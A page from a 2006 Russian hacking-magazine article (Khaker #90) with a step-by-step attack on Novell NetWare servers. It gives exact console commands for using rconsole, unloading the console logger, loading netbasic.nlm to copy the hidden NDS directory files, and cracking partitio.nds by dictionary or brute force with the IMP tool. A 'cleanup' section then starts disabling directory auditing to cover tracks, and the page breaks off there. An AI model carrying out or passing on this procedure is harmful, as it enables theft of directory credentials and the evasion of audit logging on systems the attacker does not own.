Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР #90, ИЮНЬ 2006 г.

НеТварь под ударом

CyberAnt (Sation@yandex.ru)

Хакер, номер #090, стр. 090-078-4


load remote -E 158470C4111761309539DO

Нас с тобой это, конечно, не остановит. Хакер Dreamer уже разгадал алгоритм шифрования и написал код на дяде пасе для дешифрации удаленного пароля.

Захват файлов NDS

После получения пароля утилиты rconsole начинается заключительный этап взлома — доступ к файлам NDS. Компания Novell хранит файлы NDS в скрытом каталоге _netware тома SYS. Доступ к каталогу возможен только через консоль (утилиту rconsole). Попробуем скопировать эти файлы на локальный компьютер.

Пакет NetBasic Software Development Kit (SDK) позволяет преобразовать сценарий NetBasic в загружаемый модуль Novell (NLM) для использования на web-сервере NetWare. Оказывается, конечный компонент, netbasic.nlm (SYS:SYSTEM), обладает уникальными возможностями: он обеспечивает просмотр всего тома, включая скрытый каталог _netware, из командной строки. NetBasic по умолчанию устанавливается во всех системах Netware 4.x, поэтому является наиболее распространенным средством доступа к файлам NDS. Кроме того, только NetBasic позволяет "стащить" данные из NDS без закрытия службы каталога (Directory Services). Для того чтобы лучше понять суть этого метода, рассмотрим пример:

1) Получаем доступ к rconsole командой SYS:\PUBLIC\rconsole

2) unload conlog (удаляем регистратор консоли и все записи об исполняемых командах)

3) load netbasic.nlm

4) shell

5) cd \_netware (это срытый системный каталог, видимый только в системной консоли)

6) md \login\nds

7) copy block.nds \login\nds\block.nds

8) copy enlry.nds \login\nds\entry.nds

9) copy partitio.nds \login\nds\partitio.nds

10) copy value.nds \login\nds\value.nds

11) exit (выходим из оболочки)

12) unload net basic

13) load conlog (возврат к первоначальному статусу управления)

14) Копируем файлы *.NDS на локальный компьютер

16) Можно приступить к их взлому

Взлом файлов NDS

Если тебе удалось скопировать файлы NDS, можешь собой гордиться: ты выиграл настоящую битву. Осталось дело за малым - взломать эти файлы. Для этого воспользуемся бесплатной программой IMP от Shade, и еще тебе понадобится хороший словарь для перебора. Прога реализует как взлом по словарю, так и атаку «грубой силой», а также довольно шустро работает в графическом режиме. Из четырех файлов NDS (полученным с помощью NetBasic: block.nds, entry.nds, partitio.nds и value.nds) взламывать придется только один - файл partitio.nds. Открываем окно IMP и загружаем этот файл с диска. Выбираем режим Dictionary или Brute Force и начинаем взлом.

Уборка

На этом этапе необходимо замести следы своего пребывания в системе. Нужно отключить аудит, модифицировать данные в файлах и вылечить файл регистрации.

a) Отключение аудита.

Лишние улики никому не нужны, поэтому необходимо отключить аудит службы каталогов и серверов. Для этого нужно выполнить несколько последовательных действий:

1) Запускаем SYS:PUBLIC\auditcon

2) Выбираем Audit Directory Services (Аудит службы каталога)

3) Выделяем нужный контейнер (с которым предстоит работать) и жмем F10

Назад на стр. 090-078-3  Содержание  Вперед на стр. 090-078-5
Hosted by uCoz